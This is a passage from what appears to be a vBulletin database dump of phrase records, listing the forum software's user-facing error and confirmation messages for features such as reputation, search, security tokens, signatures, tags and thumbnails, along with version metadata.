\r\nAlternatively, you can simply go back to the Forums and start posting in threads.', 'vbulletin', '', 0, ''), (34718, -1, 'regular_expression_is_invalid', 'error', 'The regular expression specified is invalid.', 'vbulletin', 'vBulletin Solutions', 1204631481, '3.7.0 Beta 6'), (34719, -1, 'reminder_title_too_long', 'error', 'Sorry, your reminder\'s title exceeded the {1} character limit by {2} characters. Please go back and shorten it', 'vbulletin', '', 0, ''), (34720, -1, 'replacement_already_exists', 'error', 'A replacement variable searching for {1} already exists. It is set to replace {1} with {2}.
\r\n
\r\nTo edit this replacement, please click here.', 'vbulletin', '', 0, ''), (34721, -1, 'report_post_floodcheck', 'error', 'This forum requires that you wait {1} seconds between reporting posts. Please try again in {2} seconds.', 'vbulletin', 'vBulletin Solutions', 1183391384, '3.6.8'), (34722, -1, 'reputation_yourpost', 'error', 'This post has not received any reputation.\r\n\r\nYou currently have {1} reputation point(s).', 'vbulletin', 'vBulletin Solutions', 1149791762, '3.6.0 Beta 2'), (34723, -1, 'reputationbanned', 'error', 'You cannot give reputation to this user.', 'vbulletin', '', 0, ''), (34724, -1, 'reputationdisabled', 'error', 'The reputation system is currently disabled.', 'vbulletin', '', 0, ''), (34725, -1, 'reputationownpost', 'error', 'You cannot add reputation to your own posts.', 'vbulletin', '', 0, ''), (34726, -1, 'reputationreason', 'error', 'A comment must be left for negative reputation.', 'vbulletin', 'vBulletin Solutions', 1148495748, '3.6.0 Beta 1'), (34727, -1, 'reputationsamepost', 'error', 'You cannot give Reputation to the same post twice.', 'vbulletin', '', 0, ''), (34728, -1, 'reputationsameuser', 'error', 'You must spread some Reputation around before giving it to {1} again.', 'vbulletin', '', 0, ''), (34729, -1, 'reputationtoomany', 'error', 'You have given out too much Reputation in the last 24 hours, try again later.', 'vbulletin', '', 0, ''), (34730, -1, 'required_field_x_missing_or_invalid', 'error', 'A required field called {1} is missing or has an invalid value.', 'vbulletin', '', 0, ''), (34731, -1, 'requiredfieldmissing', 'error', 'You have not completed the required field \"{1}\".', 'vbulletin', '', 0, ''), (34732, -1, 'requiredfields', 'error', 'Please complete all the fields. Press the back button, correct the problem then try again.', 'vbulletin', '', 0, ''), (34733, -1, 'resetbadid', 'error', 'The address that you have used to request a new password is not valid. Please request a new password be sent to you by using this form.', 'vbulletin', 'vBulletin Solutions', 1168257044, '3.6.5'), (34734, -1, 'resetexpired', 'error', 'The request to reset your password was made more than 24 hours ago, so it has expired. To resubmit the request, please use this form.', 'vbulletin', '', 0, ''), (34735, -1, 'resetpw', 'error', 'Your password has now been reset and emailed to you. Please check your email to find your new password. To change your password, please use this form.', 'vbulletin', '', 0, ''), (34736, -1, 'restore_mysql_schema', 'error', 'Restore mysql-schema.php to the install directory then try this action again', 'vbulletin', '', 0, ''), (34737, -1, 'retrieval_of_remote_file_failed', 'error', 'Retrieval of remote file failed', 'vbulletin', '', 0, ''), (34738, -1, 'reversed_infraction_successfully', 'error', 'Reversed Infraction Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34739, -1, 'sameusernamepass', 'error', 'Your password cannot be the same as your username.', 'vbulletin', 'vBulletin Solutions', 1219143144, '3.8.0 Alpha 1'), (34740, -1, 'saved_access_masks_successfully', 'error', 'Saved Access Masks Successfully', 'vbulletin', '', 0, ''), (34741, -1, 'saved_administrator_permissions_successfully', 'error', 'Saved Administrator Permissions Successfully', 'vbulletin', '', 0, ''), (34742, -1, 'saved_announcement_x_successfully', 'error', 'Saved Announcement {1} Successfully', 'vbulletin', '', 0, ''), (34743, -1, 'saved_attachment_permissions_successfully', 'error', 'Saved Attachment Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1148072849, '3.6.0 Beta 1'), (34744, -1, 'saved_attachment_type_x_successfully', 'error', 'Saved Attachment Type {1} Successfully', 'vbulletin', '', 0, ''), (34745, -1, 'saved_automatic_ban_successfully', 'error', 'Saved Automatic Ban Successfully', 'vbulletin', 'vBulletin Solutions', 1157411074, '3.6.1'), (34746, -1, 'saved_avatar_successfully', 'error', 'Saved Avatar Successfully', 'vbulletin', '', 0, ''), (34747, -1, 'saved_bb_code_x_successfully', 'error', 'Saved BB Code {1} Successfully', 'vbulletin', '', 0, ''), (34748, -1, 'saved_calendar_permissions_successfully', 'error', 'Saved Calendar Permissions Successfully', 'vbulletin', '', 0, ''), (34749, -1, 'saved_calendar_x_successfully', 'error', 'Saved Calendar {1} Successfully', 'vbulletin', '', 0, ''), (34750, -1, 'saved_category_x_successfully', 'error', 'Saved Category {1} Successfully', 'vbulletin', '', 0, ''), (34751, -1, 'saved_custom_field_x_successfully', 'error', 'Saved Custom Field {1} Successfully', 'vbulletin', '', 0, ''), (34752, -1, 'saved_display_order_successfully', 'error', 'Saved Display Order Successfully', 'vbulletin', '', 0, ''), (34753, -1, 'saved_faq_x_successfully', 'error', 'Saved FAQ {1} Successfully', 'vbulletin', '', 0, ''), (34754, -1, 'saved_forum_permissions_successfully', 'error', 'Saved Forum Permissions Successfully', 'vbulletin', '', 0, ''), (34755, -1, 'saved_forum_x_successfully', 'error', 'Saved Forum {1} Successfully', 'vbulletin', '', 0, ''), (34756, -1, 'saved_holiday_x_successfully', 'error', 'Saved Holiday {1} Successfully', 'vbulletin', '', 0, ''), (34757, -1, 'saved_infraction_group_successfully', 'error', 'Saved Infraction Group Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34758, -1, 'saved_infraction_level_successfully', 'error', 'Saved Infraction Level Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34759, -1, 'saved_infraction_successfully', 'error', 'Saved Infraction Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34760, -1, 'saved_language_successfully', 'error', 'Saved Language Successfully', 'vbulletin', '', 0, ''), (34761, -1, 'saved_language_x_successfully', 'error', 'Saved Language {1} Successfully', 'vbulletin', '', 0, ''), (34762, -1, 'saved_moderator_x_successfully', 'error', 'Saved Moderator {1} Successfully', 'vbulletin', '', 0, ''), (34763, -1, 'saved_notice_x_successfully', 'error', 'Saved Notice {1} Successfully', 'vbulletin', 'vBulletin Solutions', 1189782335, '3.6.8'), (34764, -1, 'saved_option_successfully', 'error', 'Saved Option Successfully', 'vbulletin', '', 0, ''), (34765, -1, 'saved_option_x_successfully', 'error', 'Saved Option {1} Successfully', 'vbulletin', '', 0, ''), (34766, -1, 'saved_paymentapi_x_successfully', 'error', 'Saved Payment API {1} Successfully', 'vbulletin', '', 0, ''), (34767, -1, 'saved_permissions_successfully', 'error', 'Saved Permissions Successfully', 'vbulletin', '', 0, ''), (34768, -1, 'saved_phrase_x_successfully', 'error', 'Saved Phrase {1} Successfully', 'vbulletin', '', 0, ''), (34769, -1, 'saved_plugin_successfully', 'error', 'Saved Plugin Successfully', 'vbulletin', '', 0, ''), (34770, -1, 'saved_post_icon_successfully', 'error', 'Saved Post Icon Successfully', 'vbulletin', '', 0, ''), (34771, -1, 'saved_prefix_permissions', 'error', 'Saved Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1216748247, '3.8.0 Alpha 1'), (34772, -1, 'saved_profile_customizations_successfully', 'error', 'Saved Profile Customizations Successfully', 'vbulletin', 'vBulletin Solutions', 1199377656, '3.7.0 Beta 4'), (34773, -1, 'saved_profile_picture_successfully', 'error', 'Saved Profile Picture Successfully', 'vbulletin', '', 0, ''), (34774, -1, 'saved_promotion_successfully', 'error', 'Saved Promotion Successfully', 'vbulletin', '', 0, ''), (34775, -1, 'saved_reputation_level_x_successfully', 'error', 'Saved Reputation Level {1} Successfully', 'vbulletin', '', 0, ''), (34776, -1, 'saved_reputation_successfully', 'error', 'Saved Reputation Successfully', 'vbulletin', '', 0, ''), (34777, -1, 'saved_rssfeed_x_successfully', 'error', 'Saved RSS Feed \'{1}\' Successfully', 'vbulletin', 'vBulletin Solutions', 1149590393, '3.6.0 Beta 1'), (34778, -1, 'saved_scheduled_task_x_successfully', 'error', 'Saved Scheduled Task {1} Successfully', 'vbulletin', '', 0, ''), (34779, -1, 'saved_setting_group_x_successfully', 'error', 'Saved Setting Group {1} Successfully', 'vbulletin', '', 0, ''), (34780, -1, 'saved_setting_x_successfully', 'error', 'Saved Setting {1} Successfully', 'vbulletin', '', 0, ''), (34781, -1, 'saved_settings_successfully', 'error', 'Saved Settings Successfully', 'vbulletin', '', 0, ''), (34782, -1, 'saved_signature_picture_successfully', 'error', 'Saved Signature Picture Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34783, -1, 'saved_signature_successfully', 'error', 'Saved Signature Successfully', 'vbulletin', '', 0, ''), (34784, -1, 'saved_smilie_successfully', 'error', 'Saved Smilie Successfully', 'vbulletin', '', 0, ''), (34785, -1, 'saved_style_x_successfully', 'error', 'Saved Style {1} Successfully', 'vbulletin', '', 0, ''), (34786, -1, 'saved_subscription_x_successfully', 'error', 'Saved Subscription {1} Successfully', 'vbulletin', '', 0, ''), (34787, -1, 'saved_template_x_successfully', 'error', 'Saved Template {1} Successfully', 'vbulletin', '', 0, ''), (34788, -1, 'saved_topic_x_successfully', 'error', 'Saved Topic {1} Successfully', 'vbulletin', '', 0, ''), (34789, -1, 'saved_user_forum_access_successfully', 'error', 'Saved User Forum Access Successfully', 'vbulletin', '', 0, ''), (34790, -1, 'saved_user_rank_successfully', 'error', 'Saved User Rank Successfully', 'vbulletin', '', 0, ''), (34791, -1, 'saved_user_title_x_successfully', 'error', 'Saved User Title {1} Successfully', 'vbulletin', '', 0, ''), (34792, -1, 'saved_user_x_successfully', 'error', 'Saved User {1} Successfully', 'vbulletin', '', 0, ''), (34793, -1, 'saved_usergroup_leader_x_successfully', 'error', 'Saved Usergroup Leader {1} Successfully', 'vbulletin', '', 0, ''), (34794, -1, 'saved_usergroup_permissions_successfully', 'error', 'Saved Subscription Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1146676255, '3.6.0 Beta 1'), (34795, -1, 'saved_usergroup_x_successfully', 'error', 'Saved Usergroup {1} Successfully', 'vbulletin', '', 0, ''), (34796, -1, 'saved_x_successfully', 'error', 'Saved {1} Successfully', 'vbulletin', '', 0, ''), (34797, -1, 'saved_x_y_successfully', 'error', 'Saved {1} {2} Successfully', 'vbulletin', '', 0, ''), (34798, -1, 'searchdisabled', 'error', 'Searching has been disabled.', 'vbulletin', '', 0, ''), (34799, -1, 'searchfloodcheck', 'error', 'This forum requires that you wait {1} seconds between searches. Please try again in {2} seconds.', 'vbulletin', '', 0, ''), (34800, -1, 'searchinvalidterm', 'error', 'The search term you specified ({1}) is under the minimum word length ({2}) and therefore will not be found. Please make this term longer.\r\n\r\n

If this term contains a wildcard, please make this term more specific.

', 'vbulletin', '', 0, ''), (34801, -1, 'searchnametooshort', 'error', 'Please enter a name longer than 3 characters to do a partial match on.', 'vbulletin', '', 0, ''), (34802, -1, 'searchnoresults', 'error', 'Sorry - no matches. Please try some different terms.\r\n\r\n{1}', 'vbulletin', '', 0, ''), (34803, -1, 'searchnoresults_getnew', 'error', 'Sorry, there are no new threads to view.

You may search for threads updated during the previous 24 hours, here.', 'vbulletin', '', 0, ''), (34804, -1, 'searchnoresults_titlesonly', 'error', 'Sorry - no matches. Please try some different terms.\r\n\r\n{1}

Your search included threads from which you only have permission to view their titles. You may find further results if you search only the titles of these threads. Click here to do so.

', 'vbulletin', 'vBulletin Solutions', 1210586909, '3.7.1'), (34805, -1, 'searchspecifyterms', 'error', 'Please specify some words or valid user names to search on. There were no matches for those that you specified.', 'vbulletin', '', 0, ''), (34806, -1, 'security_alert_hash_mismatch', 'error', 'Security alert: hash mismatch. Please press back, refresh the page, and try again.', 'vbulletin', '', 0, ''), (34807, -1, 'security_alert_tools_still_exists_in_x', 'error', 'Security Alert!

tools.php still remains in the /{1}/ directory.

This poses a security risk, so please delete that file immediately. You cannot access the control panel until you do so.', 'vbulletin', '', 0, ''), (34808, -1, 'security_alert_x_still_exists', 'error', 'Security Alert!

\r\n{1} still remains in the /install/ directory.

\r\nThis poses a security risk, so please delete that file immediately. You cannot access the control panel until you do so.', 'vbulletin', '', 0, ''), (34809, -1, 'security_token_guest', 'error', 'Your submission could not be processed because you have logged in since the previous page was loaded.
\r\n
\r\nPlease push the back button and reload the previous window.', 'vbulletin', 'vBulletin Solutions', 1212160587, '3.8.0 Alpha 1'), (34810, -1, 'security_token_guest_ajax', 'error', 'Your submission could not be processed because you have logged in since the previous page was loaded.
\r\n
\r\nPlease reload the window.', 'vbulletin', 'vBulletin Solutions', 1220658170, '3.8.0 Alpha 1'), (34811, -1, 'security_token_invalid', 'error', 'Your submission could not be processed because a security token was invalid.
\r\n
\r\nIf this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.', 'vbulletin', 'vBulletin Solutions', 1212160421, '3.8.0 Alpha 1'), (34812, -1, 'security_token_missing', 'error', 'Your submission could not be processed because a security token was missing.
\r\n
\r\nIf this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.', 'vbulletin', 'vBulletin Solutions', 1212160367, '3.8.0 Alpha 1'), (34813, -1, 'security_token_timeout', 'error', 'Your submission could not be processed because the token has expired.
\r\n
\r\nPlease push the back button and reload the previous window.', 'vbulletin', 'vBulletin Solutions', 1217249747, '3.8.0 Alpha 1'), (34814, -1, 'security_token_timeout_ajax', 'error', 'Your submission could not be processed because the token has expired.
\r\n
\r\nPlease reload the window.', 'vbulletin', 'vBulletin Solutions', 1220658219, '3.8.0 Alpha 1'), (34815, -1, 'select_valid_dob', 'error', 'You must select a date of birth before you can continue.
\r\n
\r\nValid years are from 1902 to {1}.', 'vbulletin', 'vBulletin Solutions', 1195232532, '3.7.0 Beta 1'), (34816, -1, 'session_timed_out_login', 'error', 'Your session timed out while you were composing this post and you were logged out. You must log in again to continue.', 'vbulletin', '', 0, ''), (34817, -1, 'setting_validation_error_cookietimeout', 'error', 'Setting a cookie timeout shorter than 60 seconds could render your board unusable, as you may not have time to enter the control panel to change the cookie timeout value to something longer before you are logged out.', 'vbulletin', 'vBulletin Solutions', 1160587674, '3.6.3'), (34818, -1, 'setting_validation_error_globalignore', 'error', 'This field must contain a list of user IDs separated by spaces or be empty. Example, \'1 2 3 4\' ', 'vbulletin', 'vBulletin Solutions', 1156504577, '3.6.1'), (34819, -1, 'setting_validation_error_rpuserid', 'error', 'Invalid Username', 'vbulletin', 'vBulletin Solutions', 1149695883, '3.6.0 Beta 1'), (34820, -1, 'setting_validation_error_showvotes', 'error', 'Enter a value greater than 1', 'vbulletin', 'vBulletin Solutions', 1158271350, '3.6.2'), (34821, -1, 'setting_validation_error_thumbcolor', 'error', 'Color codes must be entered in the format #E67A6D', 'vbulletin', 'vBulletin Solutions', 1149694632, '3.6.0 Beta 1'), (34822, -1, 'setting_validation_error_welcomepm', 'error', 'Invalid Username', 'vbulletin', 'vBulletin Solutions', 1149696030, '3.6.0 Beta 1'), (34823, -1, 'sg_search_field_x_unknown', 'error', 'There was an error: Search field {1} is unknown', 'vbulletin', 'vBulletin Solutions', 1197976360, '3.7.0 Beta 3'), (34824, -1, 'showemail', 'error', 'The email address for {1} is {2}', 'vbulletin', '', 0, ''), (34825, -1, 'sig_bbcode_size_tag_too_big', 'error', 'BB code size value is too big.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34826, -1, 'sig_pic_already_used', 'error', 'You may not use your signature picture more than once.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34827, -1, 'signaturedisabled', 'error', 'Sorry, the administrator has disabled signatures.', 'vbulletin', '', 0, ''), (34828, -1, 'sigpic_in_use', 'error', 'You may not delete your signature picture while it is in use in your signature.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34829, -1, 'sigtoolong_excludingbbcode', 'error', 'Your signature cannot be longer than {1} characters excluding BB code markup.', 'vbulletin', 'vBulletin Solutions', 1206965706, '3.7.0 Release Candidate 2'), (34830, -1, 'sigtoolong_includingbbcode', 'error', 'Your signature cannot be longer than {1} characters including BB code markup.', 'vbulletin', 'vBulletin Solutions', 1206965718, '3.7.0 Release Candidate 2'), (34831, -1, 'sigtoomanylines', 'error', 'Your signature contains too many lines and must be shortened. You may only have up to {1} line(s). Long text may have been implicitly wrapped, causing it to be counted as multiple lines.', 'vbulletin', 'vBulletin Solutions', 1206620816, '3.7.0 Release Candidate 2'), (34832, -1, 'smilie_categories_dont_support_permissions', 'error', 'Sorry, smilie categories do not support usergroup permissions', 'vbulletin', '', 0, ''), (34833, -1, 'smilie_replace_text_x_exists', 'error', 'A smilie with the replacement text \'{1}\' already exists. This replacement must be unique.', 'vbulletin', '', 0, ''), (34834, -1, 'social_bookmarks_disabled', 'error', 'Social bookmarks are globally disabled. No bookmark links will show in threads until the option is enabled here.', 'vbulletin', 'vBulletin Solutions', 1205755819, '3.7.0 Release Candidate 1'), (34835, -1, 'social_group_category_deleted', 'error', 'Social group category deleted', 'vbulletin', 'vBulletin Solutions', 1215705378, '3.8.0 Alpha 1'), (34836, -1, 'socialgroupiconsdisabled', 'error', 'The administrator has disabled the use of social group icons.', 'vbulletin', 'vBulletin Solutions', 1216312351, '3.8.0 Alpha 1'), (34837, -1, 'sorry_no_tables_were_submitted_to_be_renamed', 'error', 'Sorry, no tables were submitted to be renamed.', 'vbulletin', '', 0, ''), (34838, -1, 'sorry_you_are_not_allowed_to_edit_admin_permissions', 'error', 'Sorry, you are not allowed to edit administrator permissions.

If you think you should have permission to access this page, you will need to edit the $config[\'SpecialUsers\'][\'superadministrators\'] variable in the includes/config.php file.

To allow the administrators to access this page, edit the variable to include the user IDs of those administrators should have access, separating each user ID with a comma, like this:

$config[\'SpecialUsers\'][\'superadministrators\'] = \'1,25,57\';

To allow only a single administrator to access this page, simply add that user\'s ID with no commas, like this:

$config[\'SpecialUsers\'][\'superadministrators\'] = \'1\';', 'vbulletin', '', 0, ''), (34839, -1, 'source_and_destination_identical', 'error', 'The source and destination users cannot be identical', 'vbulletin', '', 0, ''), (34840, -1, 'start_date_after_end', 'error', 'Start date is after the end date', 'vbulletin', '', 0, ''), (34841, -1, 'strikes', 'error', 'Wrong username or password. You have used up your failed login quota! Please wait 15 minutes before trying again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here!', 'vbulletin', '', 0, ''), (34842, -1, 'style_already_exists', 'error', 'A style called \'{1}\' already exists. - To use this style file, either overwrite the style called \'{1}\', or enter a different title on the upload form.', 'vbulletin', '', 0, ''), (34843, -1, 'subscription_nofolders', 'error', 'You must first create a custom folder if you wish to be able to move threads to a different folder. You may start by clicking here.', 'vbulletin', 'vBulletin Solutions', 1216205297, '3.8.0 Alpha 1'), (34844, -1, 'subsnoselected', 'error', 'You did not select any threads.', 'vbulletin', '', 0, ''), (34845, -1, 'successfully_requested_group_transfer', 'error', 'A transfer request has been sent.', 'vbulletin', 'vBulletin Solutions', 1220980370, '3.8.0 Alpha 1'), (34846, -1, 'table_status_not_available', 'error', 'Table Status Not Available on MySQL Version {1}', 'vbulletin', '', 0, ''), (34847, -1, 'tag_add_failed_html', 'error', 'The following errors occurred when trying to add tags to this thread:\r\n
    {1}
\r\nAny changes that did not error have been applied. Click here to return to this thread.', 'vbulletin', 'vBulletin Solutions', 1196336761, '3.7.0 Beta 1'), (34848, -1, 'tag_add_failed_plain', 'error', 'Some tags couldn\'t be added for the following reason(s):{1}\r\nChanges that did not cause errors have been applied.', 'vbulletin', 'vBulletin Solutions', 1196350990, '3.7.0 Beta 1'), (34849, -1, 'tag_exists', 'error', 'This tag already exists.', 'vbulletin', 'vBulletin Solutions', 1190808799, '3.7.0 Beta 1'), (34850, -1, 'tag_no_censored', 'error', 'You cannot use a tag that contains censored words.', 'vbulletin', 'vBulletin Solutions', 1190899144, '3.7.0 Beta 1'), (34851, -1, 'tag_no_comma', 'error', 'Tags cannot contain delimiters (such as commas).', 'vbulletin', 'vBulletin Solutions', 1211458540, '3.7.1'), (34852, -1, 'tag_no_create', 'error', 'You do not have permission to create tags. You may only use existing tags.', 'vbulletin', 'vBulletin Solutions', 1190899168, '3.7.0 Beta 1'), (34853, -1, 'tag_not_allowed', 'error', 'BB code {1} is not allowed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34854, -1, 'tag_saved', 'error', 'Tag Saved Successfully', 'vbulletin', 'vBulletin Solutions', 1190808717, '3.7.0 Beta 1'), (34855, -1, 'tag_too_long_max_x', 'error', 'You specified a tag that was too long. A tag can only be {1} characters.', 'vbulletin', 'vBulletin Solutions', 1190899076, '3.7.0 Beta 1'), (34856, -1, 'tag_too_short_min_x', 'error', 'You specified a tag that was too short. A tag must be at least {1} characters.', 'vbulletin', 'vBulletin Solutions', 1196252509, '3.7.0 Beta 1'), (34857, -1, 'tag_x_not_be_common_words', 'error', 'Tags cannot be overly common words ({1}).', 'vbulletin', 'vBulletin Solutions', 1196435117, '3.7.0 Beta 1'), (34858, -1, 'tags_edited_successfully', 'error', 'Tags Edited Successfully', 'vbulletin', 'vBulletin Solutions', 1198717163, '3.7.0 Beta 4'), (34859, -1, 'task_not_enabled_product_x_disabled', 'error', 'This scheduled task cannot be enabled. {1}, the product associated with this task, is currently disabled. It must be enabled before this task can be enabled.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34860, -1, 'template_conditional_beginning_missing_x', 'error', '
The conditional on line {1} appears to be missing its beginning tag (<if>). This may cause unexpected behavior.
', 'vbulletin', 'vBulletin Solutions', 1187004075, '3.6.8'), (34861, -1, 'template_conditional_end_missing_x', 'error', '
The conditional on line {1} appears to be missing its end tag (</if>). The template will not function properly unless this is fixed.
', 'vbulletin', 'vBulletin Solutions', 1150118407, '3.6.0 Beta 2'), (34862, -1, 'template_history_entries_deleted', 'error', 'Template History Entries Deleted', 'vbulletin', '', 0, ''), (34863, -1, 'template_x_exists', 'error', 'The template \'{1}\' already exists in this style.', 'vbulletin', '', 0, ''), (34864, -1, 'test_file_write_failed', 'error', 'We attempted to write a test file to {1}, but we were unsuccessful. Please verify that the web server has write/delete permissions for this path.', 'vbulletin', '', 0, ''), (34865, -1, 'there_are_no_infraction_levels', 'error', 'There are no infraction levels defined.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34866, -1, 'there_is_already_bb_code_named_x', 'error', 'There is already a BB code tag named \'{1}\'. You may not create duplicate names.', 'vbulletin', 'vBulletin Solutions', 1206965727, '3.7.0 Release Candidate 2'), (34867, -1, 'there_is_already_faq_item_named_x', 'error', 'There is already a FAQ Item named \'{1}\'. You may not create duplicate names.', 'vbulletin', '', 0, ''), (34868, -1, 'there_is_already_option_named_x', 'error', 'There is already an option named \'{1}\'. You may not create duplicate names.', 'vbulletin', 'vBulletin Solutions', 1162212355, '3.6.3'), (34869, -1, 'there_is_already_phrase_named_x', 'error', 'There is already a phrase named \'{1}\'. You may not create duplicate names.', 'vbulletin', '', 0, ''), (34870, -1, 'there_is_already_prefix_named_x', 'error', 'There is already a prefix named \'{1}\'. You may only have 1 prefix with this name.', 'vbulletin', 'vBulletin Solutions', 1190029321, '3.7.0 Beta 1'), (34871, -1, 'there_is_already_prefix_set_named_x', 'error', 'There is already a prefix set named \'{1}\'. You may only have 1 prefix set with this name.', 'vbulletin', 'vBulletin Solutions', 1190029344, '3.7.0 Beta 1'), (34872, -1, 'there_is_already_setting_named_x', 'error', 'There is already a setting named \'{1}\'. You may not create duplicate settings.', 'vbulletin', '', 0, ''), (34873, -1, 'there_were_errors_encountered_with_your_upload_x', 'error', 'There was an error encountered with your upload:
\r\n
\r\n
    \r\n
  • {1}
  • \r\n
', 'vbulletin', '', 0, ''), (34874, -1, 'this_file_appears_to_be_a_plugin', 'error', 'This file appears to be a Plugin, not a Product. Please use the Plugin Manager to add this file.', 'vbulletin', '', 0, ''), (34875, -1, 'this_file_appears_to_be_a_product', 'error', 'This file appears to be a Product, not a Plugin. Please use Manage Products to add this file.', 'vbulletin', '', 0, ''), (34876, -1, 'this_forum_does_not_have_any_moderators', 'error', 'This forum does not have any moderators.', 'vbulletin', '', 0, ''), (34877, -1, 'this_is_already_option_named_x', 'error', 'There is already an option named \'{1}\'. You may not create duplicate names.', 'vbulletin', '', 0, ''), (34878, -1, 'this_user_is_already_a_moderator', 'error', 'This User is already a Moderator in the specified Forum.', 'vbulletin', '', 0, ''), (34879, -1, 'thread_displayip', 'error', 'The IP Address is: {1}
\r\nThe host name is: {2}', 'vbulletin', 'vBulletin Solutions', 1199991017, '3.7.0 Beta 4'), (34880, -1, 'thread_has_max_allowed_tags', 'error', 'This thread already has the maximum number of tags and you are not allowed to edit any existing tags.', 'vbulletin', 'vBulletin Solutions', 1197895234, '3.7.0 Beta 2'), (34881, -1, 'thread_is_already_in_the_forum', 'error', 'After much intense calculation, it has been decided that your thread is already in the forum that you wish to move it to.

Deep Thought should be jealous.', 'vbulletin', '', 0, ''), (34882, -1, 'thread_prefix_required', 'error', 'You must select a thread prefix.', 'vbulletin', 'vBulletin Solutions', 1190039036, '3.7.0 Beta 1'), (34883, -1, 'threadclosed', 'error', 'Sorry! This thread is closed!', 'vbulletin', '', 0, ''), (34884, -1, 'threadrateclosed', 'error', 'Sorry you cannot rate closed threads.', 'vbulletin', '', 0, ''), (34885, -1, 'threadratevoted', 'error', 'According to our records you have already voted on this thread. Changing votes is not allowed.', 'vbulletin', '', 0, ''), (34886, -1, 'thumbnail_failed_x', 'error', 'Thumbnail creation failed:
{1}
', 'vbulletin', '', 0, ''), (34887, -1, 'thumbnail_nocreateimage', 'error', 'Thumbnail creation failed due to either an invalid image or the wrong version of GD specified in the vBulletin settings.', 'vbulletin', '', 0, ''), (34888, -1, 'thumbnail_nogetimagesize', 'error', 'Thumbnail creation failed due to inability to obtain image size.', 'vbulletin', '', 0, ''), (34889, -1, 'thumbnail_nogif', 'error', 'Thumbnail creation failed due to no GIF support in GD.', 'vbulletin', '', 0, ''), (34890, -1, 'thumbnail_nojpg', 'error', 'Thumbnail creation failed due to no JPG support in GD.', 'vbulletin', '', 0, ''), (34891, -1, 'thumbnail_nopng', 'error', 'Thumbnail creation failed due to no PNG support in GD.', 'vbulletin', '', 0, ''), (34892, -1, 'thumbnail_nosupport', 'error', 'Thumbnail creation failed due to your image library not having support for this image type.', 'vbulletin', '', 0, ''), (34893, -1, 'thumbnail_notcorrectimage', 'error', 'Thumbnail creation failed since the extension of this file is incorrect.', 'vbulletin', '', 0, ''), (34894, -1, 'thumbnail_notenoughmemory', 'error', 'Thumbnail creation failed due to insufficient memory.', 'vbulletin', '', 0, ''), (34895, -1, 'title_toolong', 'error', 'The title that you have entered is too long ({1} characters). Please shorten it to {2} characters long.', 'vbulletin', 'vBulletin Solutions', 1159272519, '3.6.2'), (34896, -1, 'too_many_profile_field_options', 'error', 'You may only specify up to 31 options for checkbox or select_multiple input types. You entered {1} options for this field.', 'vbulletin', 'vBulletin Solutions', 1204733516, '3.7.0 Beta 6'), (34897, -1, 'toobusy', 'error', 'The server is too busy at the moment. Please try again later.', 'vbulletin', '', 0, ''), (34898, -1, 'toolong', 'error', 'The text that you have entered is too long ({1} characters). Please shorten it to {2} characters long.', 'vbulletin', '', 0, ''), (34899, -1, 'toomanyimages', 'error', 'You have included {1} images in your message. You are limited to using {2} images so please go back and correct the problem and then continue again.\r\n
\r\n
\r\nImages include use of smilies, the BB code [img] tag and HTML <img> tags. The use of these is all subject to them being enabled by the administrator.', 'vbulletin', 'vBulletin Solutions', 1195819614, '3.7.0 Beta 1'), (34900, -1, 'tooshort', 'error', 'The message you have entered is too short. Please lengthen your message to at least {1} characters.', 'vbulletin', '', 0, ''), (34901, -1, 'unable_to_delete_file', 'error', 'Unable to delete file', 'vbulletin', '', 0, ''), (34902, -1, 'unable_to_open_url', 'error', 'Unable to open URL or no data returned.', 'vbulletin', 'vBulletin Solutions', 1151348042, '3.6.0 Beta 4'), (34903, -1, 'unable_to_read_md5_sums', 'error', 'Unable to read MD5 sums from file includes/md5_sums_vbulletin.php', 'vbulletin', '', 0, ''), (34904, -1, 'unable_write_backup_file_x', 'error', 'Unable to write backup to file {1}. This file or the directory this file is in must be world writable!', 'vbulletin', '', 0, ''), (34905, -1, 'under_thirteen_registration_denied', 'error', 'Sorry, we are unable to register your account at this time.', 'vbulletin', 'vBulletin Solutions', 1144876472, '3.6.0 Beta 1'), (34906, -1, 'unregistereduser', 'error', 'This user has not registered and therefore does not have a profile to view.', 'vbulletin', '', 0, ''), (34907, -1, 'updated_answer_successfully', 'error', 'Updated Answer Successfully', 'vbulletin', 'vBulletin Solutions', 1192563493, '3.7.0 Beta 1'), (34908, -1, 'updated_attachment_successfully', 'error', 'Updated Attachment Successfully', 'vbulletin', '', 0, ''), (34909, -1, 'updated_forum_successfully', 'error', 'Updated Forum Successfully', 'vbulletin', '', 0, ''), (34910, -1, 'updated_podcast_settings_successfully', 'error', 'Updated Podcast Settings Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34911, -1, 'updated_post_cache_successfully', 'error', 'Updated Post Cache Successfully', 'vbulletin', '', 0, ''), (34912, -1, 'updated_post_counts_successfully', 'error', 'Updated Post Counts Successfully', 'vbulletin', '', 0, ''), (34913, -1, 'updated_question_successfully', 'error', 'Updated Question Successfully', 'vbulletin', 'vBulletin Solutions', 1192563513, '3.7.0 Beta 1'), (34914, -1, 'updated_reason_successfully', 'error', 'Updated Reason Successfully', 'vbulletin', '', 0, ''), (34915, -1, 'updated_signature_cache_successfully', 'error', 'Updated Signature Cache Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34916, -1, 'updated_similar_threads_successfully', 